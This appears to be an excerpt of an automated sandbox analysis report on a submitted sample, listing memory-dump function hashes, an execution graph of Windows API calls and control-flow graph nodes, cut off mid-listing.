                                • Instruction Fuzzy Hash: 7C018139B004141BDBE5957DD850B6F73DBEBC9720F20892EE20AC7740EA29DC474795
                                Function 064CA428 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d9d44845dd2c3025310423d9fb20bc84a6b1c306eb975ef7ad6bbfa744e695a0
                                • Instruction ID: d9dbae6433dc4780bec08a748c16bb8dee989017fb13f6a4bab87cb1968be1a4
                                • Opcode Fuzzy Hash: d9d44845dd2c3025310423d9fb20bc84a6b1c306eb975ef7ad6bbfa744e695a0
                                • Instruction Fuzzy Hash: E501A434B009280FDBA1EA7CE454B2B73D6EB89320F20853EE50EC7354DE21DC828795
                                Function 064C83E0 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c802f5b7edf11bc4b0c79a5c56318bedbdcf978145a85bed33ca8bfed7a75def
                                • Instruction ID: 61f697fbd1fd0b2121b10ed8997fe022007c7a30f58cf03812b0efb172be1ad6
                                • Opcode Fuzzy Hash: c802f5b7edf11bc4b0c79a5c56318bedbdcf978145a85bed33ca8bfed7a75def
                                • Instruction Fuzzy Hash: 6FF0FF3AA00610CFEFE59E94E9802BA7BB9EB80324F1044ABC904C7341E731D902CB99
                                Function 064C6580 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c78b93127cd9275d5f1138cc4d34d0d939dd46d47541b03b6eaa680960a760f
                                • Instruction ID: 2548923a38a0e1b3def73e723981194578fbe77a44403c0477285b36f6ad1784
                                • Opcode Fuzzy Hash: 8c78b93127cd9275d5f1138cc4d34d0d939dd46d47541b03b6eaa680960a760f
                                • Instruction Fuzzy Hash: 38E09274D152486BDBA1CE74A90A75B7BAD9B02224F2184AAE804CB34AE576CA424791
                                Function 064C4B61 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.3899432454.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_64c0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0e2b673771c60212afc2a5f6f0c5ae738061f40444893d7ec986753c7239eb8
                                • Instruction ID: 43634853f5fd520ded0b6006d9dd40adb59bf6902a69f9f0a4dc40663c99f291
                                • Opcode Fuzzy Hash: b0e2b673771c60212afc2a5f6f0c5ae738061f40444893d7ec986753c7239eb8
                                • Instruction Fuzzy Hash: C8F0B734A54129EBDB549F94E9A8BAE7BB2BF48710F20051AE402A7394DB745D42DB80

                                Execution Graph

                                Execution Coverage:8%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:154
                                Total number of Limit Nodes:4
                                execution_graph 39659 55982f8 39660 5598325 39659->39660 39675 5597d4c 39660->39675 39662 55983b9 39663 5597d4c GetModuleHandleW 39662->39663 39664 55983eb 39663->39664 39681 5597d5c 39664->39681 39666 559841d 39667 5597d4c GetModuleHandleW 39666->39667 39668 5598681 39667->39668 39669 5597d5c GetModuleHandleW 39668->39669 39670 55986b3 39669->39670 39671 5597d4c GetModuleHandleW 39670->39671 39672 559882e 39671->39672 39673 5597d4c GetModuleHandleW 39672->39673 39674 5598860 39673->39674 39676 5597d57 39675->39676 39686 14576e0 39676->39686 39691 1457100 39676->39691 39695 14576f7 39676->39695 39677 559a905 39677->39662 39682 5597d67 39681->39682 39684 1457130 GetModuleHandleW 39682->39684 39747 145866a 39682->39747 39683 559b034 39683->39666 39684->39683 39688 14576e3 39686->39688 39687 14576eb 39687->39677 39688->39687 39699 1457130 39688->39699 39690 14577ad 39690->39677 39692 145710b 39691->39692 39693 1457130 GetModuleHandleW 39692->39693 39694 14577ad 39693->39694 39694->39677 39696 1457702 39695->39696 39697 1457130 GetModuleHandleW 39696->39697 39698 14577ad 39697->39698 39698->39677 39700 145713b 39699->39700 39702 145892b 39700->39702 39706 145afe2 39700->39706 39701 1458969 39701->39690 39702->39701 39710 145d0c0 39702->39710 39715 145d0d0 39702->39715 39720 145b000 39706->39720 39723 145b010 39706->39723 39707 145afee 39707->39702 39711 145d0f1 39710->39711 39712 145d115 39711->39712 39731 145d390 39711->39731 39735 145d3a0 39711->39735 39712->39701 39716 145d0f1 39715->39716 39717 145d115 39716->39717 39718 145d390 GetModuleHandleW 39716->39718 39719 145d3a0 GetModuleHandleW 39716->39719 39717->39701 39718->39717 39719->39717 39726 145b0f8 39720->39726 39721 145b01f 39721->39707 39724 145b01f 39723->39724 39725 145b0f8 GetModuleHandleW 39723->39725 39724->39707 39725->39724 39727 145b13c 39726->39727 39728 145b119 39726->39728 39727->39721 39728->39727 39729 145b340 GetModuleHandleW 39728->39729 39730 145b36d 39729->39730 39730->39721 39732 145d3ad 39731->39732 39734 145d3e7 39732->39734 39739 145b688 39732->39739 39734->39712 39736 145d3ad 39735->39736 39737 145b688 GetModuleHandleW 39736->39737 39738 145d3e7 39736->39738 39737->39738 39738->39712 39740 145b693 39739->39740 39741 145e100 39740->39741 39743 145dcc0 39740->39743 39744 145dccb 39743->39744 39745 1457130 GetModuleHandleW 39744->39745 39746 145e16f 39745->39746 39746->39741 39748 1458678 39747->39748 39749 145892b 39748->39749 39751 145afe2 GetModuleHandleW 39748->39751 39750 1458969 39749->39750 39752 145d0c0 GetModuleHandleW 39749->39752 39753 145d0d0 GetModuleHandleW 39749->39753 39750->39683 39751->39749 39752->39750 39753->39750 39763 55c3a68 39765 55c3a76 39763->39765 39764 55c3a7e 39765->39764 39768 55c33a4 39765->39768 39769 55c33af 39768->39769 39771 1457130 GetModuleHandleW 39769->39771 39772 145866a GetModuleHandleW 39769->39772 39770 55c3b4f 39771->39770 39772->39770 39754 55c67f0 39757 55c54f8 39754->39757 39756 55c67fd 39758 55c5503 39757->39758 39760 14576f7 GetModuleHandleW 39758->39760 39761 1457100 GetModuleHandleW 39758->39761 39762 14576e0 GetModuleHandleW 39758->39762 39759 55c6994 39759->39756 39760->39759 39761->39759 39762->39759 39773 140d01c 39774 140d034 39773->39774 39775 140d08e 39774->39775 39778 5592cf8 39774->39778 39784 5592ce8 39774->39784 39779 5592d25 39778->39779 39780 5592d57 39779->39780 39790 5592f4c 39779->39790 39796 5592e80 39779->39796 39801 5592e70 39779->39801 39785 5592d25 39784->39785 39786 5592d57 39785->39786 39787 5592f4c 2 API calls 39785->39787 39788 5592e70 2 API calls 39785->39788 39789 5592e80 2 API calls 39785->39789 39787->39786 39788->39786 39789->39786 39791 5592f0a 39790->39791 39792 5592f5a 39790->39792 39806 5592f38 39791->39806 39809 5592f2a 39791->39809 39793 5592f20 39793->39780 39798 5592e94 39796->39798 39797 5592f20 39797->39780 39799 5592f38 2 API calls 39798->39799 39800 5592f2a 2 API calls 39798->39800 39799->39797 39800->39797 39803 5592e80 39801->39803 39802 5592f20 39802->39780 39804 5592f38 2 API calls 39803->39804 39805 5592f2a 2 API calls 39803->39805 39804->39802 39805->39802 39807 5592f49 39806->39807 39813 5594372 39806->39813 39807->39793 39810 5592f38 39809->39810 39811 5592f49 39810->39811 39812 5594372 2 API calls 39810->39812 39811->39793 39812->39811 39814 559438a 39813->39814 39815 559437a 39813->39815 39814->39807 39818 5594390 39815->39818 39822 55943a0 39815->39822 39819 55943e9 39818->39819 39820 55943e2 39818->39820 39819->39814 39820->39819 39821 559443a CallWindowProcW 39820->39821 39821->39819 39823 55943e2 39822->39823 39825 55943e9 39822->39825 39824 559443a CallWindowProcW 39823->39824 39823->39825 39824->39825 39825->39814 39826 55c46a0 39829 55c3414 39826->39829 39828 55c46bf 39830 55c341f 39829->39830 39832 1457130 GetModuleHandleW 39830->39832 39833 145866a GetModuleHandleW 39830->39833 39831 55c4744 39831->39828 39832->39831 39833->39831 39834 145d4b8 39835 145d4fe 39834->39835 39839 145d688 39835->39839 39842 145d698 39835->39842 39836 145d5eb 39845 145b750 39839->39845 39843 145d6c6 39842->39843 39844 145b750 DuplicateHandle 39842->39844 39843->39836 39844->39843 39846 145d700 DuplicateHandle 39845->39846 39847 145d6c6 39846->39847 39847->39836

                                Executed Functions

                                Function 055CBDE3 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1107 55cbde3-55cbdea 1108 55cbdec 1107->1108 1109 55cbdf1-55cbf04 1107->1109 1110 55cbdee-55cbdef 1108->1110 1111 55cbdb5-55cbddb 1108->1111 1119 55cbf66-55cbfd9 call 55ca92c 1109->1119 1120 55cbf06-55cbf5e 1109->1120 1110->1109 1123 55cbfde-55cc04b call 55c9ac8 call 55ca93c 1119->1123 1120->1119
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-227171996
                                • Opcode ID: 50518760c21e2d4c27214c0ce78fc27d75e55a307e31db0bb48f683a5e71751d
                                • Instruction ID: 7f22f3bc773184a93410c7bea5759a64a15c32f0f6f167b384bdc0eeeaf749d5
                                • Opcode Fuzzy Hash: 50518760c21e2d4c27214c0ce78fc27d75e55a307e31db0bb48f683a5e71751d
                                • Instruction Fuzzy Hash: 12710535D40B01CFDB00EF6AD495645B7B5FF85318F818AA9D849AB316EB71E898CF80
                                Function 055CA8FC Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1133 55ca8fc-55cbf04 1144 55cbf66-55cc04b call 55ca92c call 55c9ac8 call 55ca93c 1133->1144 1145 55cbf06-55cbf5e 1133->1145 1145->1144
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-227171996
                                • Opcode ID: 2145a94f3da83a846ddef9131842509604940728bc71772b07911594a5c36500
                                • Instruction ID: 20be0cac431eb6dcf86cf66ab91340882d3bdda6ef73cfd25b8e003d3cf2b3e9
                                • Opcode Fuzzy Hash: 2145a94f3da83a846ddef9131842509604940728bc71772b07911594a5c36500
                                • Instruction Fuzzy Hash: B761D431950B06CFDB00EF2AD495945B7F5FF85314B818AA9D849AB316EB71F898CF80
                                Function 0145B0F8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1158 145b0f8-145b117 1159 145b143-145b147 1158->1159 1160 145b119-145b126 call 145a48c 1158->1160 1161 145b149-145b153 1159->1161 1162 145b15b-145b19c 1159->1162 1167 145b13c 1160->1167 1168 145b128 1160->1168 1161->1162 1169 145b19e-145b1a6 1162->1169 1170 145b1a9-145b1b7 1162->1170 1167->1159 1216 145b12e call 145b7a0 1168->1216 1217 145b12e call 145b78f 1168->1217 1169->1170 1171 145b1b9-145b1be 1170->1171 1172 145b1db-145b1dd 1170->1172 1175 145b1c0-145b1c7 call 145a498 1171->1175 1176 145b1c9 1171->1176 1174 145b1e0-145b1e7 1172->1174 1173 145b134-145b136 1173->1167 1177 145b278-145b338 1173->1177 1178 145b1f4-145b1fb 1174->1178 1179 145b1e9-145b1f1 1174->1179 1181 145b1cb-145b1d9 1175->1181 1176->1181 1209 145b340-145b36b GetModuleHandleW 1177->1209 1210 145b33a-145b33d 1177->1210 1182 145b1fd-145b205 1178->1182 1183 145b208-145b211 call 145a4a8 1178->1183 1179->1178 1181->1174 1182->1183 1189 145b213-145b21b 1183->1189 1190 145b21e-145b223 1183->1190 1189->1190 1191 145b225-145b22c 1190->1191 1192 145b241-145b245 1190->1192 1191->1192 1194 145b22e-145b23e call 145a4b8 call 145a4c8 1191->1194 1214 145b248 call 145ba71 1192->1214 1215 145b248 call 145baa0 1192->1215 1194->1192 1195 145b24b-145b24e 1198 145b271-145b277 1195->1198 1199 145b250-145b26e 1195->1199 1199->1198 1211 145b374-145b388 1209->1211 1212 145b36d-145b373 1209->1212 1210->1209 1212->1211 1214->1195 1215->1195 1216->1173 1217->1173
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0145B35E
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 5c62364a71b80cda448dd448ffa47d5790638005b269c69a9719f2cb658ff092
                                • Instruction ID: aa6a1dd38b9e6127af93f1805bb50785152f7131fb40f4458d397367b3cd4b50
                                • Opcode Fuzzy Hash: 5c62364a71b80cda448dd448ffa47d5790638005b269c69a9719f2cb658ff092
                                • Instruction Fuzzy Hash: DA812370A00B058FE7A4DF6AD44575BBBF6FF48240F108A2ED84A97B61D774E845CBA0
                                Function 0145590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1218 145590c-14559d9 CreateActCtxA 1220 14559e2-1455a3c 1218->1220 1221 14559db-14559e1 1218->1221 1228 1455a3e-1455a41 1220->1228 1229 1455a4b-1455a4f 1220->1229 1221->1220 1228->1229 1230 1455a51-1455a5d 1229->1230 1231 1455a60 1229->1231 1230->1231 1232 1455a61 1231->1232 1232->1232
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 014559C9
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 813ee8d5830775d689a0d3648b813ba08e6beda7a268d10715e56a8bebd85f44
                                • Instruction ID: 9a58fa97c492ae8f06d3f39b9d1019dfad9314b61766de6c22a5b088430ba1fd
                                • Opcode Fuzzy Hash: 813ee8d5830775d689a0d3648b813ba08e6beda7a268d10715e56a8bebd85f44
                                • Instruction Fuzzy Hash: 2441BDB1C00719CBEB24CFA9C984B9EBBB5BF49304F20856AD408AB255DB756946CF50
                                Function 01454514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1234 1454514-14559d9 CreateActCtxA 1237 14559e2-1455a3c 1234->1237 1238 14559db-14559e1 1234->1238 1245 1455a3e-1455a41 1237->1245 1246 1455a4b-1455a4f 1237->1246 1238->1237 1245->1246 1247 1455a51-1455a5d 1246->1247 1248 1455a60 1246->1248 1247->1248 1249 1455a61 1248->1249 1249->1249
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 014559C9
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 9e5930b7e2a75758fbb680eeaa042befaf88650f0fdf8e897872d560ab686f08
                                • Instruction ID: a2c11f7d8a1336067b7bddab4ff9e4ad68b25d1c1d2fb96733d46f5ca68e7f5e
                                • Opcode Fuzzy Hash: 9e5930b7e2a75758fbb680eeaa042befaf88650f0fdf8e897872d560ab686f08
                                • Instruction Fuzzy Hash: 1941B2B0C0071DCBEB24DFA9C884B9EFBB5BF49704F20856AD808AB255DB756945CF90
                                Function 055943A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1251 55943a0-55943dc 1252 559448c-55944ac 1251->1252 1253 55943e2-55943e7 1251->1253 1260 55944af-55944bc 1252->1260 1254 55943e9-5594420 1253->1254 1255 559443a-5594472 CallWindowProcW 1253->1255 1261 5594429-5594438 1254->1261 1262 5594422-5594428 1254->1262 1256 559447b-559448a 1255->1256 1257 5594474-559447a 1255->1257 1256->1260 1257->1256 1261->1260 1262->1261
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05594461
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502318215.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_5590000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: db1365e2ecb1d8b81f15d8b695a986712bd9dbbe67772335a15e6eb4a5b23dfd
                                • Instruction ID: e77ca6b3ab06b1f356361d10a79146c86b7ddd03e1f25bbe810b242b0517ed7e
                                • Opcode Fuzzy Hash: db1365e2ecb1d8b81f15d8b695a986712bd9dbbe67772335a15e6eb4a5b23dfd
                                • Instruction Fuzzy Hash: E54107B5900309CFDB14CF99C488AAABBF5FF88314F24C459D519AB321E774A845CFA0
                                Function 0145B750 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1265 145b750-145d794 DuplicateHandle 1267 145d796-145d79c 1265->1267 1268 145d79d-145d7ba 1265->1268 1267->1268
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145D6C6,?,?,?,?,?), ref: 0145D787
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 62a82ffbb956ddf0f9b43da65473a99736d15e9b9d5c1bc296bcd64564ae35fe
                                • Instruction ID: a320a743531792cf4530c050597c7fd46a8ce66dbafc9756f6345f11a94050b1
                                • Opcode Fuzzy Hash: 62a82ffbb956ddf0f9b43da65473a99736d15e9b9d5c1bc296bcd64564ae35fe
                                • Instruction Fuzzy Hash: 4221D2B5D00249DFDB10CF9AD884AEEBBF4EB48310F14846AE918A3351D374A950CFA5
                                Function 0145D6F9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1271 145d6f9-145d6fb 1272 145d700-145d794 DuplicateHandle 1271->1272 1273 145d796-145d79c 1272->1273 1274 145d79d-145d7ba 1272->1274 1273->1274
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0145D6C6,?,?,?,?,?), ref: 0145D787
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 900df66e9162355048e38ddbb0ff02154972891b9d10c9e722302a43ec26820e
                                • Instruction ID: 83d735f47315a5bcd85dd6cd0090c0e373aa10e1e8e7e6671ed9a612feb98923
                                • Opcode Fuzzy Hash: 900df66e9162355048e38ddbb0ff02154972891b9d10c9e722302a43ec26820e
                                • Instruction Fuzzy Hash: 4221B5B5D00249DFDB10CF9AD985ADEBBF9EB48310F14841AE918A3350D378A954CFA5
                                Function 0145B2F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1277 145b2f8-145b338 1278 145b340-145b36b GetModuleHandleW 1277->1278 1279 145b33a-145b33d 1277->1279 1280 145b374-145b388 1278->1280 1281 145b36d-145b373 1278->1281 1279->1278 1281->1280
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0145B35E
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1493664600.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_1450000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: b42db2e643e21be6a25b03a139ac0dc36e7ad0404dc1e7043f3d43eab6708c9d
                                • Instruction ID: 08c3a4e9387a7dafb4f3d588d65bbbca85ab7bb9508f9940522ba8316bcd9a14
                                • Opcode Fuzzy Hash: b42db2e643e21be6a25b03a139ac0dc36e7ad0404dc1e7043f3d43eab6708c9d
                                • Instruction Fuzzy Hash: 75110FB6C002498FDB10CF9AC444B9EFBF5EB88210F10846AD819B7211C379A545CFA1
                                Function 055CE8D8 Relevance: .6, Instructions: 551COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1577 55ce8d8-55ce9a6 call 55cd864 1584 55ce9a8-55ce9b2 1577->1584 1585 55ce9da 1577->1585 1586 55ce9b4-55ce9c0 1584->1586 1587 55ce9d3-55ce9d8 1584->1587 1588 55ce9dc-55ce9ff call 55ca660 call 55ca8bc 1585->1588 1721 55ce9c2 call 55cf458 1586->1721 1722 55ce9c2 call 55cf468 1586->1722 1587->1588 1594 55cea26-55cea49 1588->1594 1595 55cea01-55cea11 1588->1595 1590 55ce9c8-55ce9d1 1590->1588 1601 55cea4f-55cea53 1594->1601 1602 55cf0e2-55cf0eb 1594->1602 1598 55cea20-55cea23 1595->1598 1599 55cea13-55cea1e 1595->1599 1598->1594 1599->1594 1603 55cea55-55cea59 1601->1603 1604 55ceaa7-55cead1 1601->1604 1605 55cea5b-55cea82 call 55ca660 call 55cd874 1603->1605 1606 55cea87-55ceaa2 call 55ca660 call 55cd874 1603->1606 1617 55cf0bc-55cf0dc 1604->1617 1619 55cead7-55ceae0 call 55cd884 1604->1619 1621 55ceb29-55ceb2d 1605->1621 1606->1617 1617->1601 1617->1602 1630 55ceaf4-55ceb12 1619->1630 1631 55ceae2-55ceaf2 1619->1631 1624 55ceb2f-55ceb39 call 55cd894 1621->1624 1625 55ceb50-55ceb59 call 55cd8a4 1621->1625 1624->1625 1638 55ceb3b-55ceb45 call 55cd8a4 1624->1638 1634 55cf08f-55cf099 call 55cd8a4 1625->1634 1635 55ceb5f-55ceb8d call 55ca88c call 55cd8b4 1625->1635 1637 55ceb18-55ceb25 1630->1637 1631->1637 1646 55cf09f-55cf0ae call 55ca660 call 55ca670 1634->1646 1647 55cf09b-55cf09d 1634->1647 1653 55ceb8f-55ceb9f 1635->1653 1654 55ceba1-55cebaa call 55cd8b4 1635->1654 1637->1621 1638->1625 1648 55ceb47-55ceb4b call 55cd874 1638->1648 1650 55cf0b3-55cf0b7 call 55ca8dc 1646->1650 1647->1650 1648->1625 1650->1617 1653->1654 1661 55cebc7-55cebcb 1653->1661 1662 55ced8f-55ced93 1654->1662 1663 55cebb0-55cebc1 1654->1663 1664 55cebcd-55cebd0 1661->1664 1665 55cebd2 1661->1665 1666 55ced9a 1662->1666 1667 55ced95-55ced98 1662->1667 1663->1661 1663->1662 1668 55cebd5-55cebec 1664->1668 1665->1668 1669 55ced9d-55cedb5 1666->1669 1667->1669 1671 55cebee-55cebf1 1668->1671 1672 55cebf3 1668->1672 1673 55cedbc 1669->1673 1674 55cedb7-55cedba 1669->1674 1675 55cebf6-55cec46 1671->1675 1672->1675 1676 55cedbf-55cee04 1673->1676 1674->1676 1677 55cec78 1675->1677 1678 55cec48-55cec54 1675->1678 1683 55cee0a-55ceea1 1676->1683 1684 55ceea3-55ceef2 1676->1684 1681 55cec7a-55cec7c 1677->1681 1678->1677 1679 55cec56-55cec62 1678->1679 1679->1677 1682 55cec64-55cec76 1679->1682 1685 55ced1b-55ced6a 1681->1685 1686 55cec82-55ced19 1681->1686 1682->1681 1687 55ceef7-55cef0d 1683->1687 1684->1687 1688 55ced6f-55ced8a 1685->1688 1686->1688 1689 55cef12-55cef34 call 55ca8dc 1687->1689 1688->1689 1694 55cef5e 1689->1694 1695 55cef36-55cef41 1689->1695 1697 55cef60-55cef62 1694->1697 1695->1694 1696 55cef43-55cef49 1695->1696 1696->1694 1698 55cef4b-55cef5c 1696->1698 1699 55cef64-55cef70 call 55cd874 1697->1699 1700 55cef72-55cef76 1697->1700 1698->1697 1703 55cefc5-55cefce call 55cd884 1699->1703 1702 55cef78-55cef7c 1700->1702 1700->1703 1702->1703 1706 55cef7e-55cefa3 1702->1706 1708 55cefd0-55cf000 1703->1708 1709 55cf002-55cf055 1703->1709 1706->1703 1711 55cefa5-55cefc0 call 55cd874 1706->1711 1717 55cf061-55cf08d 1708->1717 1709->1717 1711->1703 1717->1617 1721->1590 1722->1590
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1502434595.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_55c0000_FrFvspxoHsPs.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 106c2cdec5497a510845cd051b3c35ca27fb58370eb0d74ecfd29f18b8884a54
                                • Instruction ID: 8113c3bfd2111a66b090338e53e6ced1b5dfe545b1504c96321b4e592e30fb99
                                • Opcode Fuzzy Hash: 106c2cdec5497a510845cd051b3c35ca27fb58370eb0d74ecfd29f18b8884a54
                                • Instruction Fuzzy Hash: 6F42EA31E10619CFCB15DFA8C8946EDFBB1BF89304F1186A9D459B7251EB70AA85CF80
                                Function 055CE8C8 Relevance: .3, Instructions: 338COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1723 55ce8c8-55ce8ca 1724 55ce8cc-55ce8d0 1723->1724 1725 55ce8d1-55ce8d2 1723->1725 1724->1725 1726 55ce8d9-55ce8dc 1725->1726 1727 55ce8d3-55ce8d6 1725->1727 1728 55ce8dd-55ce9a6 call 55cd864 1726->1728 1727->1728 1729 55ce8d8 1727->1729 1734 55ce9a8-55ce9b2 1728->1734 1735 55ce9da 1728->1735 1729->1726 1736 55ce9b4-55ce9c0 1734->1736 1737 55ce9d3-55ce9d8 1734->1737 1738 55ce9dc-55ce9ff call 55ca660 call 55ca8bc 1735->1738 1871 55ce9c2 call 55cf458 1736->1871 1872 55ce9c2 call 55cf468 1736->1872 1737->1738 1744 55cea26-55cea49 1738->1744 1745 55cea01-55cea11 1738->1745 1740 55ce9c8-55ce9d1 1740->1738 1751 55cea4f-55cea53 1744->1751 1752 55cf0e2-55cf0eb 1744->1752 1748 55cea20-55cea23 1745->1748 1749 55cea13-55cea1e 1745->1749 1748->1744 1749->1744 1753 55cea55-55cea59 1751->1753 1754 55ceaa7-55cead1 1751->1754 1755 55cea5b-55cea82 call 55ca660 call 55cd874 1753->1755 1756 55cea87-55ceaa2 call 55ca660 call 55cd874 1753->1756 1767 55cf0bc-55cf0dc 1754->1767 1769 55cead7-55ceae0 call 55cd884 1754->1769 1771 55ceb29-55ceb2d 1755->1771 1756->1767 1767->1751 1767->1752 1780 55ceaf4-55ceb12 1769->1780 1781 55ceae2-55ceaf2 1769->1781 1774 55ceb2f-55ceb39 call 55cd894 1771->1774 1775 55ceb50-55ceb59 call 55cd8a4 1771->1775 1774->1775 1788 55ceb3b-55ceb45 call 55cd8a4 1774->1788 1784 55cf08f-55cf099 call 55cd8a4 1775->1784 1785 55ceb5f-55ceb8d call 55ca88c call 55cd8b4 1775->1785 1787 55ceb18-55ceb25 1780->1787 1781->1787 1796 55cf09f-55cf0ae call 55ca660 call 55ca670 1784->1796 1797 55cf09b-55cf09d 1784->1797 1803 55ceb8f-55ceb9f 1785->1803 1804 55ceba1-55cebaa call 55cd8b4 1785->1804 1787->1771 1788->1775 1798 